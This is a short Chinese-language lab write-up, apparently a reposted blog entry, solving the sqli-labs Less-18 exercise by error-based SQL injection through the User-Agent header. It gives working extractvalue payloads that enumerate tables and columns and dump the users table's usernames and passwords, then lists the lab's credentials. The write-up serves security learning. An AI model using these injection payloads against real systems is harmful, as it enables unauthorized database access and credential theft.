Less(18) Header Injection

1.报错型,单引号,user-agent型注入

  

   看到user-agent 的回显,猜测注入点在user-agnet,可以直接测试,但是还是去看看php文件吧:

    

   发现也对password也做了check

    

     又看到了inseert语句,他把user-agent插入到数据库,所以可以从这里下手,而且看到除开是单引号型,接下来开始爆破

 2.爆破:

  (1)把user-agent修改一下就行:'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and'

      

 没毛病,可以爆破

  (2)爆库之前都爆过了  

  (3)爆表:' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))  and'

    

  (4)爆列名:' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and column_name not in('user_id','first_name','last_name','user','avatar','last_login','failed_login'))))  and' 

    

   (5)爆值:' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))  and' 

  

     

    通过 not in(),我们可以找到所有的用户名和密码:

    Dumb:Dumb    Angelinal:I-kill-you   Dummy:p@ssword   secure:crappy   stupid:stupidiry   superman:genious   batman:mob!le   admin:admin   admin1:admin1   admin2:admin2   admin3:admin3   dhakkan:dumbo   admin4:admin4

原文地址:https://www.cnblogs.com/meng-yu37/p/12303639.html